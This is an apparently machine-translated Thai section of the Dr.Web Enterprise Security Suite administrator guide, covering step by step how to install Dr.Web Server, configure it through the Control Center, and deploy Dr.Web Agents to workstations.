เลือกคอมพิวเตอร์ที่จะทำหน้าที่ของ Dr.Web Server เครือข่ายป้องกันไวรัสอาจมี Dr.Web Servers หลายตัว คุณสมบัติของการกำหนดค่านี้มีอธิบายไว้ในคู่มือผู้ดูแลระบบ, ป. ลักษณะเฉพาะของเครือข่ายที่มี Dr.Web Servers หลายตัว.

Dr.Web Server สามารถติดตั้งได้บนคอมพิวเตอร์ทุกเครื่อง ไม่เพียงแต่ในคอมพิวเตอร์ที่ทำหน้าที่เป็นเซิร์ฟเวอร์ LAN เท่านั้น ข้อกำหนดหลักสำหรับคอมพิวเตอร์เครื่องนี้มีอยู่ในหน้าความต้องการของระบบ. Dr.Web Agent เวอร์ชันเดียวกันได้รับการติดตั้งบนสถานีที่ได้รับการป้องกันทั้งหมด รวมทั้งเซิร์ฟเวอร์ LAN ความแตกต่างอยู่ในรายการส่วนประกอบต่อต้านไวรัสที่ติดตั้ง ซึ่งกำหนดโดยการตั้งค่าบนเซิร์ฟเวอร์

ในการติดตั้ง Dr.Web Server และ Dr.Web Agent จำเป็นต้องมีการเข้าถึงแบบครั้งเดียว (ทางกายภาพหรือโดยใช้รีโมทคอนโทรลและเครื่องมือเปิดโปรแกรม) ไปยังคอมพิวเตอร์ที่เกี่ยวข้อง การดำเนินการเพิ่มเติมทั้งหมดจะดำเนินการจากที่ทำงานของผู้ดูแลระบบเครือข่ายป้องกันไวรัส (รวมถึงอาจมาจากภายนอกเครือข่ายท้องถิ่น) และไม่ต้องการเข้าถึง Dr.Web Servers หรือเวิร์กสเตชัน

2. ตามแผน กำหนดว่าผลิตภัณฑ์ใดที่จะต้องติดตั้งระบบปฏิบัติการบนโหนดเครือข่ายที่เกี่ยวข้อง ดูข้อมูลผลิตภัณฑ์โดยละเอียดได้ที่เนื้อหาของการจัดส่ง.

ผลิตภัณฑ์ที่จำเป็นทั้งหมดสามารถซื้อเป็น Dr.Web Enterprise Security Suite ชนิดบรรจุกล่องหรือดาวน์โหลดจากเว็บไซต์ Doctor Webhttps://download.drweb.ru/.

Dr.Web Agent สำหรับสถานีภายใต้ Android OS, Linux OS, OS X สามารถติดตั้งจากแพ็คเกจสำหรับผลิตภัณฑ์แบบสแตนด์อโลนและเชื่อมต่อกับ Dr.Web Server แบบรวมศูนย์ในภายหลัง คำอธิบายของการตั้งค่าที่เกี่ยวข้องของตัวแทนมีอยู่ในคู่มือการติดตั้ง, ป. การติดตั้ง Dr.Web Agent โดยใช้แพ็คเกจการติดตั้งส่วนบุคคล.

3. ติดตั้งชุดการแจกจ่ายหลักของ Dr.Web Server บนคอมพิวเตอร์หรือคอมพิวเตอร์ที่เลือก คำอธิบายการติดตั้งอยู่ในคู่มือการติดตั้ง, ป. การติดตั้ง Dr.Web Server.

Dr.Web Security Control Center ได้รับการติดตั้งร่วมกับเซิร์ฟเวอร์

ตามค่าเริ่มต้น Dr.Web Server จะเริ่มทำงานโดยอัตโนมัติหลังการติดตั้งและหลังจากการรีสตาร์ทระบบปฏิบัติการทุกครั้ง

4. หากเครือข่ายป้องกันไวรัสจะรวมสถานีที่ได้รับการป้องกันไว้ภายใต้ระบบปฏิบัติการ Android, Linux OS, OS X ให้ติดตั้งแพ็คเกจการแจกจ่าย Dr.Web Server เพิ่มเติมบนคอมพิวเตอร์ทุกเครื่องที่ติดตั้งแพ็คเกจการแจกจ่ายเซิร์ฟเวอร์หลัก

5. หากจำเป็น ให้ติดตั้งและกำหนดค่าพร็อกซีเซิร์ฟเวอร์ คำอธิบายจะได้รับในคู่มือการติดตั้ง, ป. การตั้งค่าพร็อกซีเซิร์ฟเวอร์.

6. ในการกำหนดค่าเซิร์ฟเวอร์และซอฟต์แวร์ป้องกันไวรัสบนสถานี คุณต้องเชื่อมต่อกับเซิร์ฟเวอร์โดยใช้ Dr.Web Security Control Center

ศูนย์ควบคุมมีให้บริการที่:

http://<Адрес_Сервера> :9080

หรือ

https://<Адрес_Сервера> :9081

ในทางตรงกันข้าม<Адрес_Сервера> ระบุที่อยู่ IP หรือชื่อโดเมนของคอมพิวเตอร์ที่ติดตั้ง Dr.Web Server

ชื่อผู้ดูแลระบบเริ่มต้นคือผู้ดูแลระบบ

รหัสผ่าน:

สำหรับ Windows OS รหัสผ่านที่ระบุระหว่างการติดตั้งเซิร์ฟเวอร์

สำหรับ OS ของตระกูล UNIX -ราก.

เมื่อเชื่อมต่อกับเซิร์ฟเวอร์สำเร็จ หน้าต่างหลักของศูนย์ควบคุมจะเปิดขึ้น (สำหรับคำอธิบายโดยละเอียด โปรดดูที่คู่มือผู้ดูแลระบบในหน้า Dr.Web Security Control Center).

7. ดำเนินการกำหนดค่าเริ่มต้นของเซิร์ฟเวอร์ (สำหรับคำอธิบายโดยละเอียดของการตั้งค่าเซิร์ฟเวอร์ โปรดดูที่คู่มือผู้ดูแลระบบ, ใน บทที่ 8: การกำหนดค่า Dr.Web Server):

ก. ในบท ตัวจัดการใบอนุญาตเพิ่มคีย์ใบอนุญาตอย่างน้อยหนึ่งรายการและแจกจ่ายให้กับกลุ่มที่เหมาะสม โดยเฉพาะกับกลุ่มทุกคน . ขั้นตอนนี้จำเป็นหากไม่มีการระบุคีย์ใบอนุญาตระหว่างการติดตั้งเซิร์ฟเวอร์

ข. ในบท การกำหนดค่าที่เก็บทั่วไประบุองค์ประกอบของเครือข่ายป้องกันไวรัสที่จะอัปเดตจาก Dr.Web GUS ในบทสถานะที่เก็บอัปเดตผลิตภัณฑ์ในที่เก็บเซิร์ฟเวอร์ การอัปเดตอาจใช้เวลานาน รอให้กระบวนการอัปเดตเสร็จสิ้นก่อนดำเนินการกำหนดค่าเพิ่มเติม

ค. ในเพจ การดูแลระบบ → Dr.Web Serverให้ข้อมูลเกี่ยวกับเวอร์ชันของเซิร์ฟเวอร์ หากมีเวอร์ชันใหม่ให้อัปเดตเซิร์ฟเวอร์ตามที่อธิบายไว้ในคู่มือผู้ดูแลระบบ, ป. กำลังอัปเดต Dr.Web Server และการกู้คืนจากข้อมูลสำรอง.

ง. ปรับถ้าจำเป็นเชื่อมต่อเครือข่ายเพื่อเปลี่ยนการตั้งค่าเครือข่ายเริ่มต้นที่ใช้สำหรับการโต้ตอบระหว่างส่วนประกอบทั้งหมดของเครือข่ายป้องกันไวรัส

อี หากจำเป็น ให้กำหนดค่ารายชื่อผู้ดูแลเซิร์ฟเวอร์ การรับรองความถูกต้องภายนอกของผู้ดูแลระบบก็มีให้เช่นกัน ดูรายละเอียดได้ที่คู่มือผู้ดูแลระบบ, ใน บทที่ 5: ผู้ดูแลระบบเครือข่ายป้องกันไวรัส.

ฉ. ก่อนเริ่มการทำงานของซอฟต์แวร์ป้องกันไวรัส ขอแนะนำให้เปลี่ยนการตั้งค่าไดเรกทอรีสำรองข้อมูลสำคัญของเซิร์ฟเวอร์ (ดูคู่มือผู้ดูแลระบบ, ป. การตั้งค่ากำหนดการ Dr.Web Server). ขอแนะนำให้วางไดเร็กทอรีนี้ในไดรฟ์ภายในเครื่องอื่นเพื่อลดความเป็นไปได้ที่ไฟล์ซอฟต์แวร์เซิร์ฟเวอร์จะสูญหายและสำเนาสำรองพร้อมกัน

8. ระบุการตั้งค่าและการกำหนดค่าซอฟต์แวร์ป้องกันไวรัสสำหรับเวิร์กสเตชัน (สำหรับคำอธิบายโดยละเอียดของการกำหนดค่ากลุ่มและสถานี โปรดดูคู่มือผู้ดูแลระบบ, ใน บทที่ 6และ บทที่ 7):

ก. หากจำเป็น ให้สร้างกลุ่มผู้ใช้ของสถานี

ข. ตั้งค่ากลุ่มทุกคน และสร้างกลุ่มผู้ใช้ โดยเฉพาะอย่างยิ่ง กำหนดค่าส่วนส่วนประกอบที่ติดตั้งได้

9. ติดตั้งซอฟต์แวร์ Dr.Web Agent บนเวิร์กสเตชัน

ในบท ไฟล์การติดตั้งอ่านรายการไฟล์ที่ให้ไว้สำหรับการติดตั้ง Agent เลือกตัวเลือกการติดตั้งที่เหมาะสมกับคุณตามระบบปฏิบัติการของสถานี ความเป็นไปได้ของการติดตั้งระยะไกล ตัวเลือกในการระบุการตั้งค่าเซิร์ฟเวอร์เมื่อติดตั้ง Agent เป็นต้น ตัวอย่างเช่น:

หากผู้ใช้ติดตั้งโปรแกรมป้องกันไวรัสด้วยตนเอง ให้ใช้แพ็คเกจการติดตั้งส่วนบุคคลที่สร้างขึ้นผ่านศูนย์ควบคุมแยกต่างหากสำหรับแต่ละสถานี แพ็คเกจประเภทนี้สามารถส่งไปยังผู้ใช้ทางอีเมลได้โดยตรงจากศูนย์ควบคุม หลังจากการติดตั้ง สถานีจะเชื่อมต่อกับเซิร์ฟเวอร์โดยอัตโนมัติ

สำหรับการติดตั้งระยะไกลผ่านเครือข่ายไปยังสถานีหรือหลายสถานีพร้อมกัน (สำหรับสถานีภายใต้ระบบปฏิบัติการ Windows เท่านั้น) ให้ใช้โปรแกรมติดตั้งเครือข่าย การติดตั้งดำเนินการผ่านศูนย์ควบคุมโดยใช้ส่วนขยายเบราว์เซอร์

นอกจากนี้ยังสามารถติดตั้งจากระยะไกลผ่านเครือข่ายไปยังสถานีหรือหลายสถานีพร้อมกันโดยใช้บริการ Active Directory ในการดำเนินการนี้ ให้ใช้โปรแกรมติดตั้ง Dr.Web Agent สำหรับเครือข่ายที่มี Active Directory ซึ่งมาพร้อมกับแพ็คเกจการแจกจ่ายของ Dr.Web Enterprise Security Suite แต่แยกจากตัวติดตั้งเซิร์ฟเวอร์

หากจำเป็นต้องลดโหลดบนช่องทางการสื่อสารระหว่างเซิร์ฟเวอร์และสถานีระหว่างการติดตั้ง คุณสามารถใช้ตัวติดตั้งแบบเต็มซึ่งติดตั้ง Agent และส่วนประกอบการป้องกันพร้อมกันได้

การติดตั้งบนสถานีภายใต้ Android OS, Linux OS, OS X สามารถทำได้ภายในเครื่องตามกฎทั่วไป นอกจากนี้ ผลิตภัณฑ์แบบสแตนด์อโลนที่ติดตั้งไว้แล้วสามารถเชื่อมต่อกับเซิร์ฟเวอร์ตามการกำหนดค่าที่เหมาะสม

10. ทันทีหลังจากติดตั้งบนคอมพิวเตอร์ เอเจนต์จะสร้างการเชื่อมต่อกับเซิร์ฟเวอร์โดยอัตโนมัติ การอนุญาตสถานีป้องกันไวรัสบนเซิร์ฟเวอร์เกิดขึ้นตามนโยบายที่คุณเลือก (ดูคู่มือผู้ดูแลระบบ, ป. นโยบายการเชื่อมต่อสถานี):

ก. เมื่อติดตั้งจากแพ็คเกจการติดตั้ง เช่นเดียวกับเมื่อกำหนดค่าการยืนยันอัตโนมัติบนเซิร์ฟเวอร์ เวิร์กสเตชันจะถูกลงทะเบียนโดยอัตโนมัติเมื่อเชื่อมต่อกับเซิร์ฟเวอร์เป็นครั้งแรก และไม่จำเป็นต้องมีการยืนยันเพิ่มเติม

ข. เมื่อติดตั้งจากตัวติดตั้งและกำหนดค่าการยืนยันการเข้าถึงด้วยตนเอง ผู้ดูแลระบบต้องยืนยันเวิร์กสเตชันใหม่ด้วยตนเองสำหรับการลงทะเบียนบนเซิร์ฟเวอร์ ในกรณีนี้ เวิร์กสเตชันใหม่จะไม่เชื่อมต่อโดยอัตโนมัติ แต่เซิร์ฟเวอร์จะวางไว้ในกลุ่มผู้เริ่มต้น

11. หลังจากเชื่อมต่อกับเซิร์ฟเวอร์และรับการตั้งค่าแล้ว ชุดส่วนประกอบแพ็คเกจป้องกันไวรัสที่เหมาะสมซึ่งระบุไว้ในการตั้งค่าของกลุ่มหลักของสถานีจะถูกติดตั้งบนสถานี

12. การกำหนดค่าสถานีและซอฟต์แวร์ป้องกันไวรัสยังสามารถทำได้หลังการติดตั้ง (สำหรับคำอธิบายโดยละเอียด โปรดดูที่คู่มือผู้ดูแลระบบ, ใน บทที่ 7).